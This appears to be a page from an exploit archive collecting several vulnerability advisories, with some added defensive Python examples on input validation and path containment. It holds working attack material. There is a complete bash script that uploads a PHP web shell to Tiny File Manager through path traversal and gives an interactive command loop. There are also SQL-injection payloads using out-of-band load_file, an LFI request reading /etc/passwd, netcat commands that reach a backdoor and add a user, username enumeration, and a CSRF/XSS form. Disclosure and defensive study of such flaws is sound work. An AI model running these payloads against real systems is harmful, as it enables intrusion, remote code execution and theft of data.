<pre><code><br />H3C SSL VPN Username Enumeration<br /><br /><br />Vendor: Hangzhou H3C Technologies Co. | New H3C Technologies Co., Ltd.<br />Product web page: https://www.h3c.com<br />Affected version: n/a<br /><br />Summary: H3C SSL VPN is a secure VPN system based on SSL connections. It allows mobile employees<br />to access corporate networks remotely in an easy and secure way. The H3C SSL VPN devices are a<br />new generation of professional SSL VPN devices for enterprises. They can function as ingress<br />gateways as well as proxy gateways of internal server clusters. The SecPath SSL VPN devices are<br />for small- to medium-sized enterprises, while the SecBlade SSL VPN devices are for medium-sized<br />enterprises.<br /><br />Desc: The weakness is caused by the login script and how it verifies provided credentials. An<br />attacker can use this weakness to enumerate valid users on the affected application via the 'txtUsrName'<br />POST parameter, because each of the three failure cases shown below returns a different error message.<br /><br />Tested on: ssl vpn gateway HttpServer 1.1<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5697<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5697.php<br /><br /><br />24.01.2022<br /><br />--<br /><br /><br />Non-valid:<br />----------<br /><br />POST https://10.0.0.5/svpn/vpnuser/login_submit.cgi<br /><br />txtMacAddr=000000000000&svpnlang=en&selIdentity=1&txtUsrName=root&txtPassword=123456&selDomain=1&authmethod=1&vldCode=<br /><br /><br /> <tr><td align="center">User is not exist</TD></TR><br /><br /><br /><br />Valid:<br />------<br /><br />POST https://10.0.0.5/svpn/vpnuser/login_submit.cgi<br /><br />txtMacAddr=000000000000&svpnlang=en&selIdentity=1&txtUsrName=administrator&txtPassword=123456&selDomain=1&authmethod=1&vldCode=<br /><br /> <tr><td align="center">Input password incorrect</TD></TR><br /><br /><br /><br />Valid:<br />------<br /><br />POST 
https://10.0.0.5/svpn/vpnuser/login_submit.cgi<br /><br />txtMacAddr=000000000000&svpnlang=en&selIdentity=1&txtUsrName=guest&txtPassword=123456&selDomain=1&authmethod=1&vldCode=<br /><br /> <tr><td align="center">Local user state is inactive</TD></TR><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/991c1f02c809cee860cb712896a45338.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Ncx.b<br />Vulnerability: Unauthenticated Remote Command Execution<br />Description: The malware listens on TCP port 99. Third-party attackers who can reach an infected system can execute OS commands further compromising the host.<br />Type: PE32<br />MD5: 991c1f02c809cee860cb712896a45338<br />Vuln ID: MVID-2021-0421<br />Disclosure: 12/11/2021<br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 99<br />Microsoft Windows [Version 10.0.16299.309]<br />(c) 2017 Microsoft Corporation. All rights reserved.<br /><br />C:\Users\Victim\Desktop>whoami<br />whoami<br />desktop-2c3iqho\victim<br /><br />C:\Users\Victim\Desktop>net user HYP3RLINX HELL /add<br />net user HYP3RLINX HELL /add<br />The command completed successfully<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. 
All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>## Title: Simple Bakery Shop Management System v1.0 remote SQL-Injections<br />## Author: nu11secur1ty<br />## Date: 02.14.2022<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/15174/simple-bakery-shop-management-system-phpoop-free-source-code.html<br /><br /><br />## Description:<br />The username parameter from Simple Bakery Shop Management System v1.0<br />appears to be vulnerable to SQL injection attacks.<br />The payload '+(select<br />load_file('\\\\uecbuk5uwc33xkpj8ty1fdix5obhz9n0qoib8zx.https://www.sourcecodester.com/php/15174/simple-bakery-shop-management-system-phpoop-free-source-code.html\\zgr'))+'<br />was submitted in the username parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed. The attacker can retrieve all<br />information about all accounts of this system.<br />A malicious actor can use this information for malicious purposes!<br />WARNING: Whether the application is hosted on an external domain, a subdomain, or<br />an internal network, this is extremely dangerous!<br />Status: CRITICAL<br /><br /><br />[+] Payload:<br /><br />```mysql<br />---<br />Parameter: username (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=gqHxMzWA'+(select<br />load_file('\\\\uecbuk5uwc33xkpj8ty1fdix5obhz9n0qoib8zx.https://www.sourcecodester.com/php/15174/simple-bakery-shop-management-system-phpoop-free-source-code.html\\zgr'))+''<br />AND (SELECT 4660 FROM (SELECT(SLEEP(3)))XYJd) AND<br />'Irjn'='Irjn&password=y0C!l3w!Q5<br />---<br /><br />```<br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/2022/Simple-Bakery-Shop-Management)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/9m854x)<br /><br /></code></pre>
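The finding comes down to the username being spliced into SQL text. The following is an added example, not the application's code: a constructed accounts table, the string-concatenated lookup that produces this class of bug, and the parameterised lookup that fixes it. sqlite3 stands in for MySQL, and the payload is a simple constructed tautology rather than the load_file()/SLEEP() payload in the report; the table and row contents are assumptions.

```python
import sqlite3

# Added example, not the application's code: a constructed accounts table, the
# string-concatenated query pattern behind the finding, and the parameterised
# form that fixes it. sqlite3 stands in for MySQL, and the payload is a simple
# constructed tautology rather than the load_file()/SLEEP() payload in the report.

CONSTRUCTED_ACCOUNTS = [
    ("admin", "admin@bakery.example", "administrator"),
    ("cashier", "cashier@bakery.example", "staff"),
    ("baker", "baker@bakery.example", "staff"),
]

# Constructed payload: the quote closes the literal and the OR makes every row match.
PAYLOAD = "nobody' OR 'a'='a"


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (username TEXT, email TEXT, role TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)", CONSTRUCTED_ACCOUNTS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, username: str) -> list:
    # Whatever the user typed is spliced into the SQL text, quotes included.
    sql = "SELECT username, email, role FROM accounts WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterised(conn: sqlite3.Connection, username: str) -> list:
    # The value travels separately from the statement; a quote inside it is data, not syntax.
    sql = "SELECT username, email, role FROM accounts WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def rows_returned(payload: str = PAYLOAD) -> tuple:
    """(rows from the concatenated query, rows from the parameterised query) for one input."""
    conn = make_db()
    return len(lookup_vulnerable(conn, payload)), len(lookup_parameterised(conn, payload))


if __name__ == "__main__":
    print("concatenated vs parameterised:", rows_returned())  # every account vs none
```

In the PHP application the equivalent is a PDO or mysqli prepared statement with bound parameters. Two further controls limit what an injection can reach even if one slips through: the database account used by the web application should not hold MySQL's FILE privilege, and secure_file_priv should be set, so load_file() against a UNC path is refused rather than triggering the out-of-band interaction the report describes.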
<pre><code># Exploit Title: HD-Network Real-time Monitoring System 2.0 - Local File Inclusion (LFI)<br /># Google Dork: intitle:"HD-Network Real-time Monitoring System V2.0"<br /># Date: 11/12/2021<br /># Exploit Author: Momen Eldawakhly (Cyber Guy)<br /># Vendor Homepage: N/A<br /># Version: V2.0<br /># Tested on: Nginx NVRDVRIPC Web Server<br /><br />Proof of Concept:<br /><br />GET /language/lang HTTP/1.1<br />Referer: http://example.com<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36<br />Cookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=; s_type=; s_devtype=<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />Accept-Encoding: gzip,deflate,br<br />Host: VulnIP<br />Connection: Keep-alive<br /><br /></code></pre>
<pre><code># Exploit Title: Slurp 1.10.2 - Remote Format String<br /># Date: 2022-02-12<br /># Author: Milad Karimi<br /><br />slurp is a freely available, open source NNTP client. It is designed for use on most Unix and Linux operating systems.<br /><br />It may be possible for a remote server to execute code on a vulnerable client. slurp offers functionality that allows the software to write messages to the system log. A format string vulnerability in the syslog function may allow a malicious server to supply a custom format string that writes to an arbitrary address in memory.<br /><br />perl -e 'print "BY BY BY \n666 %x%x%x\n"' | nc -l -p 112<br /><br />Then check /var/log/messages for something like:<br /><br />slurp[39926]: do_newnews: NNTP protocol error: got '666 bfbff4f8804bc1bbfbff51c'<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/8de56eef118187a89eeab972288ce94d.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Nucleroot.mf<br />Vulnerability: Stack Buffer Overflow<br />Description: MaskPE by yzkzero is a tool for implanting backdoors in existing PE files. The Backdoor tool doesn't properly check the files it loads and falls victim to a file-based local buffer overflow.<br />Type: PE32<br />MD5: 8de56eef118187a89eeab972288ce94d<br />Vuln ID: MVID-2021-0420<br />ASLR: False<br />DEP: False<br />Safe SEH: True<br />Disclosure: 12/11/2021<br /><br />Memory Dump:<br />(1790.60): Access violation - code c0000005 (first/second chance not available)<br />eax=00000000 ebx=00000000 ecx=41414141 edx=41414101 esi=00000003 edi=00000003<br />eip=7770ed3c esp=0019e7a8 ebp=0019e938 iopl=0 nv up ei pl nz na po nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202<br />ntdll!ZwWaitForMultipleObjects+0xc:<br />7770ed3c c21400 ret 14h<br /><br />0:000> .ecxr<br />eax=454e4141 ebx=771fb900 ecx=41414141 edx=41414101 esi=0019fbe8 edi=0019fbe8<br />eip=004090e3 esp=0019f0c8 ebp=025a43e8 iopl=0 nv up ei pl nz na pe nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206<br />*** WARNING: Unable to verify checksum for Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d<br />*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d<br />Backdoor_Win32_Nucleroot_mf+0x90e3:<br />004090e3 813850450000 cmp dword ptr [eax],4550h ds:002b:454e4141=????????<br /><br />0:000> !analyze -v<br />*******************************************************************************<br />* *<br />* Exception Analysis *<br />* *<br />*******************************************************************************<br /><br /><br />FAULTING_IP: <br 
/>Backdoor_Win32_Nucleroot_mf+90e3<br />004090e3 813850450000 cmp dword ptr [eax],4550h<br /><br />EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)<br />ExceptionAddress: 004090e3 (Backdoor_Win32_Nucleroot_mf+0x000090e3)<br /> ExceptionCode: c0000005 (Access violation)<br /> ExceptionFlags: 00000000<br />NumberParameters: 2<br /> Parameter[0]: 00000000<br /> Parameter[1]: 454e4141<br />Attempt to read from address 454e4141<br /><br />PROCESS_NAME: Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d<br /><br />ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<br /><br />EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<br /><br />EXCEPTION_PARAMETER1: 00000000<br /><br />EXCEPTION_PARAMETER2: 454e4141<br /><br />READ_ADDRESS: 454e4141 <br /><br />FOLLOWUP_IP: <br />Backdoor_Win32_Nucleroot_mf+90e3<br />004090e3 813850450000 cmp dword ptr [eax],4550h<br /><br />MOD_LIST: <ANALYSIS/><br /><br />NTGLOBALFLAG: 0<br /><br />APPLICATION_VERIFIER_FLAGS: 0<br /><br />FAULTING_THREAD: 00000060<br /><br />BUGCHECK_STR: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141<br /><br />PRIMARY_PROBLEM_CLASS: STRING_DEREFERENCE_FILL_PATTERN_41414141<br /><br />DEFAULT_BUCKET_ID: STRING_DEREFERENCE_FILL_PATTERN_41414141<br /><br />LAST_CONTROL_TRANSFER: from 004049b2 to 004090e3<br /><br />STACK_TEXT: <br />WARNING: Stack unwind information not available. 
Following frames may be wrong.<br />0019f0c8 004049b2 00000001 0019fb74 0019f438 Backdoor_Win32_Nucleroot_mf+0x90e3<br />0019fc1c 77408654 000000b8 00000000 026a1600 Backdoor_Win32_Nucleroot_mf+0x49b2<br />0042fba0 00403690 004012a0 00420e01 0042167d kernel32!BaseThreadInitThunk+0x24<br />0042fba8 00420e01 0042167d 004255fe 0042565f Backdoor_Win32_Nucleroot_mf+0x3690<br />0042fbac 0042167d 004255fe 0042565f 00425604 Backdoor_Win32_Nucleroot_mf+0x20e01<br />0042fbb0 004255fe 0042565f 00425604 00425604 Backdoor_Win32_Nucleroot_mf+0x2167d<br />0042fbb4 0042565f 00425604 00425604 00425607 Backdoor_Win32_Nucleroot_mf+0x255fe<br />0042fbb8 00425604 00425604 00425607 004021b0 Backdoor_Win32_Nucleroot_mf+0x2565f<br />0042fbbc 00425604 00425607 004021b0 00425664 Backdoor_Win32_Nucleroot_mf+0x25604<br />0042fbc0 00425607 004021b0 00425664 00425615 Backdoor_Win32_Nucleroot_mf+0x25604<br />0042fbc4 004021b0 00425664 00425615 00425659 Backdoor_Win32_Nucleroot_mf+0x25607<br />0042fbc8 00425664 00425615 00425659 00421982 Backdoor_Win32_Nucleroot_mf+0x21b0<br />0042fbcc 00425615 00425659 00421982 0042561b Backdoor_Win32_Nucleroot_mf+0x25664<br />0042fbd0 00425659 00421982 0042561b 00425655 Backdoor_Win32_Nucleroot_mf+0x25615<br />0042fbd4 00421982 0042561b 00425655 0042565f Backdoor_Win32_Nucleroot_mf+0x25659<br />0042fbd8 0042561b 00425655 0042565f 0042565f Backdoor_Win32_Nucleroot_mf+0x21982<br />0042fbdc 00425655 0042565f 0042565f 0042565f Backdoor_Win32_Nucleroot_mf+0x2561b<br />0042fbe0 0042565f 0042565f 0042565f 00420d33 Backdoor_Win32_Nucleroot_mf+0x25655<br />0042fbe4 0042565f 0042565f 00420d33 00422195 Backdoor_Win32_Nucleroot_mf+0x2565f<br />0042fbe8 0042565f 00420d33 00422195 0042214c Backdoor_Win32_Nucleroot_mf+0x2565f<br />0042fbec 00420d33 00422195 0042214c 00423e5e Backdoor_Win32_Nucleroot_mf+0x2565f<br />0042fcec 00420d4d 00420d33 00690053 0065007a Backdoor_Win32_Nucleroot_mf+0x20d33<br />0042fcf0 00420d33 00690053 0065007a 0066004f 
Backdoor_Win32_Nucleroot_mf+0x20d4d<br />0042fcf4 00690053 0065007a 0066004f 006d0049 Backdoor_Win32_Nucleroot_mf+0x20d33<br />0042fcf8 0065007a 0066004f 006d0049 00670061 0x690053<br />0042fcfc 0066004f 006d0049 00670061 00000065 0x65007a<br />0042fd00 006d0049 00670061 00000065 00610042 0x66004f<br />0042fd04 00670061 00000065 00610042 00650073 0x6d0049<br />0042fd08 00000000 00610042 00650073 0066004f 0x670061<br /><br /><br />STACK_COMMAND: ~0s; .ecxr ; kb<br /><br />SYMBOL_STACK_INDEX: 0<br /><br />SYMBOL_NAME: Backdoor_Win32_Nucleroot_mf+90e3<br /><br />FOLLOWUP_NAME: MachineOwner<br /><br />MODULE_NAME: Backdoor_Win32_Nucleroot_mf<br /><br />IMAGE_NAME: Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d<br /><br />DEBUG_FLR_IMAGE_TIMESTAMP: 4456df74<br /><br />FAILURE_BUCKET_ID: STRING_DEREFERENCE_FILL_PATTERN_41414141_c0000005_Backdoor.Win32.Nucleroot.mf.8de56eef118187a89eeab972288ce94d!Unknown<br /><br />BUCKET_ID: APPLICATION_FAULT_STRING_DEREFERENCE_INVALID_POINTER_READ_FILL_PATTERN_41414141_Backdoor_Win32_Nucleroot_mf+90e3<br /><br /><br />Exploit/PoC:<br />python -c "print( 'MZ'+'A'*20000)" > DOOM.exe<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. 
The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
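The faulting instruction compares the dword at an address taken from the file against 4550h, which is "PE\0\0" read as a little-endian dword, so the crash is the PE-signature check dereferencing an unchecked e_lfanew from the 'A'-filled PoC file (bytes 0x3C..0x3F are 'AAAA', giving 0x41414141). The following is an added example, not MaskPE's or Malvuln's code: a header walk that bounds-checks each offset before dereferencing it, run against the PoC file and against a constructed minimal valid header.

```python
import struct

# Added example, not MaskPE's or Malvuln's code: a header walk that bounds-checks
# every offset before it is dereferenced. The comparison against 4550h in the
# faulting instruction is the little-endian "PE\0\0" signature test; the crash
# is what that test looks like when e_lfanew is taken from the file unchecked.

PE_SIGNATURE = b"PE\x00\x00"  # reads as 0x00004550 when compared as a dword
DOS_HEADER_SIZE = 0x40
E_LFANEW_OFFSET = 0x3C


def validate_pe_headers(data: bytes) -> dict:
    """Locate the PE header, refusing the file at the first offset that leaves the buffer."""
    if len(data) < DOS_HEADER_SIZE:
        return {"ok": False, "reason": "shorter than a DOS header"}
    if data[:2] != b"MZ":
        return {"ok": False, "reason": "missing MZ signature"}
    (e_lfanew,) = struct.unpack_from("<I", data, E_LFANEW_OFFSET)
    # With the PoC file, bytes 0x3C..0x3F are 'AAAA', so e_lfanew is 0x41414141.
    if e_lfanew < DOS_HEADER_SIZE or e_lfanew + len(PE_SIGNATURE) > len(data):
        return {"ok": False,
                "reason": f"e_lfanew 0x{e_lfanew:08x} points outside the {len(data)}-byte file"}
    if data[e_lfanew:e_lfanew + len(PE_SIGNATURE)] != PE_SIGNATURE:
        return {"ok": False, "reason": f"no PE signature at 0x{e_lfanew:x}"}
    return {"ok": True, "pe_offset": e_lfanew}


def build_crash_file(fill: int = 20000) -> bytes:
    """The advisory's PoC input: 'MZ' followed by 20000 'A' bytes."""
    return b"MZ" + b"A" * fill


def build_minimal_image(pe_offset: int = 0x80) -> bytes:
    """Constructed well-formed stub: DOS header with e_lfanew set, padding, then the PE signature."""
    dos = bytearray(b"MZ" + b"\x00" * (DOS_HEADER_SIZE - 2))
    struct.pack_into("<I", dos, E_LFANEW_OFFSET, pe_offset)
    return bytes(dos) + b"\x00" * (pe_offset - DOS_HEADER_SIZE) + PE_SIGNATURE


if __name__ == "__main__":
    print(validate_pe_headers(build_crash_file()))     # rejected: e_lfanew 0x41414141 ...
    print(validate_pe_headers(build_minimal_image()))  # {'ok': True, 'pe_offset': 128}
```

The same discipline applies to every later header field a loader reads (NumberOfSections, SizeOfOptionalHeader, each section's PointerToRawData and SizeOfRawData): treat each as untrusted, check it against the buffer length before use, and fail closed. The WinDbg bucket STRING_DEREFERENCE_FILL_PATTERN_41414141 in the analysis above is the signature of exactly this kind of unchecked offset.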
<pre><code># Exploit Title: WordPress Plugin International Sms For Contact Form 7 Integration V1.2 - Cross-Site Request Forgery (CSRF)<br /># Date: 2022-02-09<br /># Author: Milad Karimi<br /># Software Link: https://wordpress.org/plugins/cf7-international-sms-integration/<br /># Version: 1.2<br /># Tested on: Windows 11<br /># CVE: CVE-2022-24272<br /><br />1. Description:<br /><br />The plugin International Sms For Contact Form 7 Integration lacked a CSRF check in class-sms-log-display.php, allowing attackers to make logged-in users perform unwanted actions, such as changing the calculator headers.<br /><br />Due to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue.<br /><br />2. Proof of Concept:<br /><br /><form method="post" action="https://example.com/cf7-international-sms-integration/includes/admin/class-sms-log-display.php?page="><br /> <input type="text" value="<script>alert(1)</script>" name="fcw[fcw_heading]"><br /> <input type="submit" value="Save" name="submit"><br /></form><br /></code></pre>
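Two separate defects are described: the save handler accepts any POST, and it stores the heading unescaped. The following is an added example, not the plugin's code, showing the shape of the fix in plain Python: a keyed token bound to the user's session and to the action (what WordPress's wp_nonce_field()/check_admin_referer() pair provides) and escaping of the stored value (what esc_html()/sanitize_text_field() provide). The site secret, session identifiers and action name are assumptions; the forged form fields are the ones from the PoC above.

```python
import hashlib
import hmac
import html
import secrets

# Added example, not the plugin's code. A keyed token bound to the user's session
# and to the action stands in for WordPress's wp_nonce_field()/check_admin_referer();
# html.escape stands in for esc_html()/sanitize_text_field().

SITE_SECRET = secrets.token_bytes(32)  # assumption: one persistent per-site key
ACTION = "cf7_sms_save_heading"        # assumption: action name used to scope the token


def issue_csrf_token(session_id: str) -> str:
    """Token the legitimate admin page embeds in its own form; a cross-site page cannot read it."""
    msg = f"{ACTION}:{session_id}".encode()
    return hmac.new(SITE_SECRET, msg, hashlib.sha256).hexdigest()


def save_heading_vulnerable(form: dict, settings: dict) -> bool:
    """Accepts any POST and stores the raw value: CSRF plus stored XSS."""
    settings["fcw_heading"] = form.get("fcw[fcw_heading]", "")
    return True


def save_heading_hardened(form: dict, session_id: str, settings: dict) -> bool:
    """Rejects requests without a token valid for this session, then stores an escaped value."""
    presented = form.get("_csrf_token", "")
    if not hmac.compare_digest(presented, issue_csrf_token(session_id)):
        return False  # the forged form from the PoC lands here
    settings["fcw_heading"] = html.escape(form.get("fcw[fcw_heading]", ""), quote=True)
    return True


# The two fields the PoC form submits.
FORGED_FORM = {"fcw[fcw_heading]": "<script>alert(1)</script>", "submit": "Save"}


if __name__ == "__main__":
    store = {}
    print(save_heading_vulnerable(FORGED_FORM, store), store)
    store = {}
    print(save_heading_hardened(FORGED_FORM, "session-1", store), store)
    legit = dict(FORGED_FORM, _csrf_token=issue_csrf_token("session-1"))
    print(save_heading_hardened(legit, "session-1", store), store)
```

The token check also needs a capability check beside it (in WordPress, current_user_can() on the relevant capability), since a valid token only proves the request came from the site's own page, not that the user is allowed to perform the action.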
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/a83989d36f3b443a757eef1c99f1a373.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Asylum.014<br />Vulnerability: Cleartext Password Storage<br />Description: Asylum v0.1.4 (Fearless Edition) has a proxy feature. The proxy credentials are stored in the Windows registry in cleartext under HKLM\SOFTWARE\WOW6432Node in a key named "Asylum".<br />Type: PE32<br />MD5: a83989d36f3b443a757eef1c99f1a373<br />Vuln ID: MVID-2021-0419<br />Disclosure: 12/11/2021<br /><br />Exploit/PoC:<br />Computer\HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Asylum<br /><br />ProxyUsername<br />HATE<br /><br />ProxyPassword <br />abc123<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>#!/bin/bash<br /># Tiny File Manager <= 2.4.3 Authenticated RCE exploit<br /># By FEBIN<br /># ./exploit.sh <URL> <Admin Username> <Password><br /># Example: ./exploit.sh http://files.ubuntu.local/index.php admin "admin@123"<br /># https://github.com/febinrev/tinyfilemanager-2.4.3-exploit<br />#<br /><br />check(){<br /><br />which curl<br />if [ $? = 0 ]<br />then<br />printf "[✔] Curl found! \n"<br />else<br />printf "[❌] Curl not found! \n"<br />exit<br />fi<br /><br />which jq<br />if [ $? = 0 ]<br />then<br />printf "[✔] jq found! \n"<br />else<br />printf "[❌] jq not found! \n"<br />exit<br />fi<br />}<br />usage(){<br /><br />printf "<br />Tiny File Manager Authenticated RCE POC Exploit.<br /><br />By FEBIN<br /><br />$0 <URL> <Admin Username> <Password><br /><br />Example: $0 http://files.ubuntu.local/index.php admin \"admin@123\"<br /><br />"<br />}<br /><br />log-in(){<br />URL=$1<br />admin=$2<br />pass=$3<br />cookie=$(curl "$URL" -X POST -s -d "fm_usr=$admin&fm_pwd=$pass" -i | grep "Set-Cookie: " | sed s/"Set-Cookie: "//g | tr -d " " | tr ";" "\n" | head -1)<br /><br />if [ $cookie ]<br />then<br />printf "\n[+] Login Success! Cookie: $cookie \n"<br />else<br />printf "\n[-] Login Failed! \n"<br />fi<br /><br />URL=${URL}<br />}<br /><br />find_webroot(){<br /><br />webroot=$(curl -X POST "$URL?p=&upload" -d "type=upload&uploadurl=http://vyvyuytcuytcuycuytuy/&ajax=true" -H "Cookie: $cookie" -s | jq | grep file | tr -d '"' | tr -d "," | tr -d " " | sed s/"file:"//g | tr "/" "\n" | head --lines=-1 | tr "\n" "/" )<br /><br />if [ $webroot ]<br />then<br />printf "\n[*] Try to Leak Web root directory path \n\n"<br />printf "[+] Found WEBROOT directory for tinyfilemanager using full path disclosure bug : $webroot \n\n"<br />else<br />printf "[-] Can't find WEBROOT! Using default /var/www/html \n"<br />webroot="/var/www/html"<br />fi<br />}<br /><br />upload(){<br /><br />#webroot="/var/www/tiny/"<br />shell="shell$RANDOM.php"<br />echo "<?php system(\$_REQUEST['cmd']); ?>" > /tmp/$shell<br /><br />curl $URL?p= -X POST -s -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0" -b $cookie -F "p=" -F "fullpath=../../../../../../../..${webroot}/${shell}" -F "file=@/tmp/$shell" | grep "successful"<br /><br />}<br /><br />exploit(){<br /><br />WEB_URL=$(printf "$URL" | tr "/" "\n" | head --lines=-1 | tr "\n" "/")<br /><br />upload<br /><br />if [ $? = 0 ]<br />then<br />printf "[+] File Upload Successful! \n"<br />else<br />printf "[-] File Upload Unsuccessful! Exiting! \n"<br />exit 1<br />fi<br /><br />printf "[+] Checking for the shell \n"<br /><br />curl ${WEB_URL}/${shell}?cmd=echo%20found -s | head -1 | grep "found" >/dev/null<br />if [ $? = 0 ]<br />then<br />printf "[+] Shell found ${WEB_URL}/$shell \n"<br />else<br />printf "[-] Shell not Found! It might be uploaded somewhere else in the server or got deleted. Exiting! \n"<br />exit 2<br />fi<br /><br />printf "[+] Getting shell access! \n\n"<br /><br />while true<br />do<br />printf "$> "<br />read cmd<br />curl ${WEB_URL}/$shell -s -X POST -d "cmd=${cmd}"<br />done<br />}<br /><br />if [ $1 ] && [ $2 ] && [ $3 ]<br />then<br />check<br />log-in $1 $2 $3<br /><br />find_webroot<br /><br />exploit<br />else<br />usage<br />fi<br /></code></pre>
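Both the HD-Network LFI earlier on this page (a cookie value of `../../../../etc/passwd` selecting the file to read) and the Tiny File Manager script above (a `fullpath` form field of `../../../../..${webroot}/${shell}` selecting where an upload is written) are the same missing control: the handler never confirms that the resolved path is still inside the directory it owns. The following is an added example, not code from either product or advisory, showing that containment check applied to both a read path and a write path. The directory names are constructed, and no files need to exist for the check to run.

```python
import os
import re
from typing import Optional

# Added example, not from either advisory: the containment check a file-reading
# handler (the s_Language cookie) or a file-writing handler (the upload
# 'fullpath' field) should apply before touching the filesystem. Directory
# names are constructed; no files need to exist for the check to run.

LANG_DIR = "/srv/www/language"   # constructed
UPLOAD_DIR = "/srv/www/uploads"  # constructed
LANG_CODE = re.compile(r"[a-z]{2}(?:_[A-Z]{2})?")  # allowlist such as 'en' or 'pt_BR'


def safe_join(base_dir: str, user_path: str) -> Optional[str]:
    """Return the resolved path of user_path under base_dir, or None if it escapes."""
    if "\x00" in user_path:
        return None  # a NUL truncates the path in C code further down; never pass it on
    base = os.path.realpath(base_dir)
    # os.path.join drops base when user_path is absolute; realpath folds every '..'.
    candidate = os.path.realpath(os.path.join(base, user_path))
    # commonpath rather than startswith, so '/srv/www/uploads2' does not pass as '/srv/www/uploads'.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def language_file(lang_cookie: str, lang_dir: str = LANG_DIR) -> Optional[str]:
    """Cookie value -> file to read. Allowlist first, containment second (defence in depth)."""
    if not LANG_CODE.fullmatch(lang_cookie):
        return None
    return safe_join(lang_dir, lang_cookie)


def upload_target(requested_name: str, upload_dir: str = UPLOAD_DIR) -> Optional[str]:
    """Client-supplied destination -> path to write, confined to the upload directory."""
    return safe_join(upload_dir, requested_name)


if __name__ == "__main__":
    traversal = "../../../../../../../../../../../../../../etc/passwd"  # value from the LFI request
    print(language_file("en"))       # /srv/www/language/en
    print(language_file(traversal))  # None
    print(upload_target("../../../../../../../../var/www/html/shell123.php"))  # None
```

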